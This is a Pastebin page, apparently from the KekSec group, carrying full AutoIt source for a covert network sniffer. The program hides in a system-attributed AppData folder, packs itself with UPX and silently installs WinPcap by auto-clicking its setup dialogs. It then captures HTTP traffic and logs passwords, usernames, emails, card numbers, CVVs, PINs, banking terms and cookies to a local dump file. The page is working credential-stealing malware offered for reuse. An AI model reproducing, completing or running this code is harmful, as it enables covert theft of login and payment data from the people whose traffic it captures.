KekSec

Private Sniffer Source code by Freak

Sep 7th, 2020 (edited)
1,088
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #NoTrayIcon
  2. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  3. #AutoIt3Wrapper_Outfile=sniffer.exe
  4. #AutoIt3Wrapper_Compression=4
  5. #AutoIt3Wrapper_UseUpx=y
  6. #AutoIt3Wrapper_Res_Language=1033
  7. #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
  8. #AutoIt3Wrapper_Run_Tidy=y
  9. #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
  10. #AutoIt3Wrapper_Tidy_Stop_OnError=n
  11. #AutoIt3Wrapper_Run_Au3Stripper=y
  12. #Au3Stripper_Parameters=/so /mi 5 /mo
  13. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  14. #include <Crypt.au3>
  15. ;==============================================;
  16. ; Thanatos AutoIt Crypter stub By Freak        ;
  17. ; Coded By Freak                               ;
  18. ; Thanks to M3 for GUI                         ;
  19. ; Keep Credits if you Using Source             ;
  20. ;==============================================;
  21. Opt("ExpandEnvStrings", 1)
  22.  
  23. Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
  24. Global $lootLoc = $installdir & "\dump.dat"
  25. Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
  26. Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
  27.  
  28. _Singleton($sMutex)
  29. If Not FileExists(@SystemDir & "\wpcap.dll") Then
  30.     InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
  31.     Run(@TempDir & "\WinPcap_4_1_3.exe")
  32.     WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
  33.     Send("!n")
  34.     WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
  35.     Send("!a")
  36.     WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
  37.     ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
  38.     WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
  39.     Send("!f")
  40. EndIf
  41. installPCAP()
  42. $winpcap = _PcapSetup()
  43. $pcap_devices = _PcapGetDeviceList()
  44. $iface = 0
  45. $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
  46. Dim $keywords[20]
  47. $keywords[0] = "GET /"
  48. $keywords[1] = "POST /"
  49. $keywords[2] = "Host: "
  50. $keywords[3] = "User-Agent: "
  51. $keywords[4] = "Content-"
  52. $keywords[5] = "password="
  53. $keywords[6] = "user_name="
  54. $keywords[7] = "user="
  55. $keywords[8] = "Username="
  56. $keywords[9] = "User="
  57. $keywords[10] = "login="
  58. $keywords[11] = "email="
  59. $keywords[12] = "username="
  60. $keywords[13] = "holder="
  61. $keywords[14] = "number="
  62. $keywords[15] = "cvv="
  63. $keywords[16] = "pin="
  64. $keywords[17] = "transaction"
  65. $keywords[18] = "bank"
  66. $keywords[19] = "Cookie: "
  67. $lootHandle = FileOpen($lootLoc, 1)
  68. $sPacketText = ""
  69. $oldPacketText = ""
  70. While True
  71.     $aPacket = _TCP_Recv($pcap)
  72.     If UBound($aPacket) > 20 Then
  73.         $sPacketText = BinaryToString("0x" & $aPacket[20])
  74.         If $sPacketText = $oldPacketText Then
  75.             Sleep(250)
  76.             ContinueLoop
  77.         EndIf
  78.         If StringLen($sPacketText) > 13 Then
  79.             For $key = 0 To UBound($keywords) - 1
  80.                 If StringInStr($sPacketText, $keywords[$key]) Then
  81.                     If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
  82.                     $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
  83.                     For $aPT = 1 To UBound($aPacketText) - 1
  84.                         If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
  85.                             FileWriteLine($lootHandle, $aPacketText[$aPT])
  86.                             FileFlush($lootHandle)
  87.                             $oldPacketText = $sPacketText
  88.                         EndIf
  89.                     Next
  90.                     $oldPacketText = $sPacketText
  91.                 Else
  92.                     ConsoleWrite($sPacketText & @CRLF)
  93.                 EndIf
  94.             Next
  95.         EndIf
  96.     EndIf
  97.     $oldPacketText = $sPacketText
  98. WEnd
  99. Func _PcapGetDeviceList()
  100.     Local $alldevs = DllStructCreate("ptr")
  101.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
  102.     If (@error > 0) Then Return -1
  103.     If $r[0] = -1 Then Return -1
  104.     Local $next = DllStructGetData($alldevs, 1)
  105.     Local $list[1][14]
  106.     Local $i = 0
  107.     While ($next <> 0)
  108.         Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
  109.         Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
  110.         Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
  111.         $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
  112.         $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
  113.         Local $next_addr = DllStructGetData($pcap_if, "addresses")
  114.         Local $device = StringTrimLeft($list[$i][0], 8)
  115.         Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
  116.         DllStructSetData($snames, 1, $device)
  117.         Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
  118.         If IsPtr($handle[0]) Then
  119.             Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
  120.             DllStructSetData($packetoiddata, 1, 0x01010102)
  121.             DllStructSetData($packetoiddata, 2, 6)
  122.             Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
  123.             If $status[0] Then
  124.                 Local $mac = DllStructGetData($packetoiddata, 3)
  125.                 $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
  126.             EndIf
  127.             Local $nettype = DllStructCreate("uint type;uint64 speed")
  128.             $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
  129.             If $status[0] Then
  130.                 $list[$i][5] = DllStructGetData($nettype, 2)
  131.             EndIf
  132.             DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
  133.         EndIf
  134.         Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
  135.         If IsPtr($pcap) Then
  136.             Local $types = _PcapGetLinkType($pcap)
  137.             If IsArray($types) Then
  138.                 $list[$i][2] = $types[0]
  139.                 $list[$i][3] = $types[1]
  140.                 $list[$i][4] = $types[2]
  141.             EndIf
  142.             _PcapStopCapture($pcap)
  143.         EndIf
  144.         While $next_addr <> 0
  145.             Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
  146.             Local $j, $addr
  147.             For $j = 2 To 4
  148.                 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
  149.                 If StringLen($addr) > 15 Then
  150.                     $list[$i][$j + 8] = $addr
  151.                 ElseIf StringLen($addr) > 6 Then
  152.                     $list[$i][$j + 5] = $addr
  153.                 EndIf
  154.             Next
  155.             $next_addr = DllStructGetData($pcap_addr, 1)
  156.         WEnd
  157.         $list[$i][13] = DllStructGetData($pcap_if, 5)
  158.         $next = DllStructGetData($pcap_if, 1)
  159.         $i += 1
  160.         If $next <> 0 Then ReDim $list[$i + 1][14]
  161.     WEnd
  162.     DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
  163.     Return $list
  164. EndFunc   ;==>_PcapGetDeviceList
  165. Func _PcapGetLinkType($pcap)
  166.     If Not IsPtr($pcap) Then Return -1
  167.     Local $type[3]
  168.     Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
  169.     $type[0] = $t[0]
  170.     Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
  171.     $type[1] = $name[0]
  172.     Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
  173.     $type[2] = $desc[0]
  174.     Return $type
  175. EndFunc   ;==>_PcapGetLinkType
  176. Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data
  177.     If Not IsPtr($pcap) Then Return -1
  178.     $Pcap_ptrhdr = DllStructCreate("ptr")
  179.     $Pcap_ptrpkt = DllStructCreate("ptr")
  180.     Local $pk[4]
  181.     Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
  182.     If ($res[0] <> 1) Then Return $res[0]
  183.     Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
  184.     Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
  185.     Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
  186.     $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
  187.     $pk[1] = DllStructGetData($pkthdr, 3)
  188.     $pk[2] = DllStructGetData($pkthdr, 4)
  189.     $pk[3] = DllStructGetData($packet, 1)
  190.     $Pcap_statV += $pk[2]
  191.     $Pcap_statN += 1
  192.     Return $pk
  193. EndFunc   ;==>_PcapGetPacket
  194. Func _PcapSendPacket($pcap, $data) ; data in Binary Format
  195.     If Not IsPtr($pcap) Then Return -1
  196.     Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
  197.     DllStructSetData($databuffer, 1, $data)
  198.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
  199.     Return $r[0]
  200. EndFunc   ;==>_PcapSendPacket
  201. Func _PcapSetup()    ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
  202.     If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
  203.     Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
  204.     Global $Pcap_errbuf = DllStructCreate("char[256]")
  205.     Global $Pcap_ptrhdr = 0
  206.     Global $Pcap_ptrpkt = 0
  207.     Global $Pcap_statV        ; Total volume captured
  208.     Global $Pcap_statN        ; Total number of packets captured
  209.     Global $Pcap_starttime    ; Start time of Capture
  210.     Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
  211.     Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
  212.     If (@error > 0) Then Return -1
  213.     Return $v[0]
  214. EndFunc   ;==>_PcapSetup
  215. Func _PcapSock2addr($sockaddr_ptr)
  216.     If ($sockaddr_ptr = 0) Then Return ""
  217.     Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
  218.     Local $family = DllStructGetData($sockaddr, 1)
  219.     If ($family = 2) Then
  220.         Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
  221.         Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
  222.     EndIf
  223.     If ($family = 23) Then
  224.         Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
  225.         Local $bin = DllStructGetData($sockaddr_in6, 4)
  226.         Local $i, $ipv6
  227.         For $i = 0 To 7
  228.             $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
  229.         Next
  230.         Return StringTrimRight($ipv6, 1)
  231.     EndIf
  232.     Return ""
  233. EndFunc   ;==>_PcapSock2addr
  234. Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
  235.     Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
  236.     If (@error > 0) Then Return -1
  237.     If ($handle[0] = 0) Then Return -1
  238.     DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
  239.     If ($filter <> "") Then
  240.         Local $fcode = DllStructCreate("UINT;ptr")
  241.         Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
  242.         If ($comp[0] = -1) Then
  243.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  244.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  245.             _PcapStopCapture($handle[0])
  246.             Return -1
  247.         EndIf
  248.         Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
  249.         If ($set[0] = -1) Then
  250.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  251.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  252.             _PcapStopCapture($handle[0])
  253.             Return -1
  254.             DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
  255.         EndIf
  256.     EndIf
  257.     If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
  258.     If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
  259.     $Pcap_statV = 0
  260.     $Pcap_statN = 0
  261.     $Pcap_starttime = TimerInit()
  262.     Return $handle[0]
  263. EndFunc   ;==>_PcapStartCapture
  264. Func _PcapStopCapture($pcap)
  265.     If Not IsPtr($pcap) Then Return
  266.     DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
  267. EndFunc   ;==>_PcapStopCapture
  268. Func _Singleton($occurenceName, $flag = 0)
  269.     Local $ERROR_ALREADY_EXISTS = 183
  270.     $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
  271.     Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
  272.     ;    Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
  273.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  274.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then
  275.         If $flag = 0 Then
  276.             Exit -1
  277.         Else
  278.             SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
  279.             Return 0
  280.         EndIf
  281.     EndIf
  282.     Return $handle[0]
  283. EndFunc   ;==>_Singleton
  284.  
  285. Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
  286.     Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
  287.     $iTimer_Capture = TimerInit()
  288.     While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
  289.         $aPacket = _PcapGetPacket($hCapture)
  290.         If IsArray($aPacket) Then
  291.             If $iPacket = $iInstance Then
  292.                 Local $aTCPPacket[21]
  293.                 $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
  294.                 $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
  295.                 $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
  296.                 $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
  297.                 $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field
  298.                 $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
  299.                 $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
  300.                 $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
  301.                 $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
  302.                 $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
  303.                 $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
  304.                 $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
  305.                 $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
  306.                 $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
  307.                 $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
  308.                 $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
  309.                 $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
  310.                 $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
  311.                 $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
  312.                 $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
  313.                 $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
  314.                 Return $aTCPPacket
  315.             EndIf
  316.             $iPacket += 1
  317.         EndIf
  318.     WEnd
  319.     Return -1
  320. EndFunc   ;==>_TCP_Recv
  321.  
  322. Func installPCAP()
  323.     DirCreate($installdir)
  324.     FileSetAttrib($installdir, "+SH")
  325. EndFunc   ;==>installPCAP
  326.  
RAW Paste Data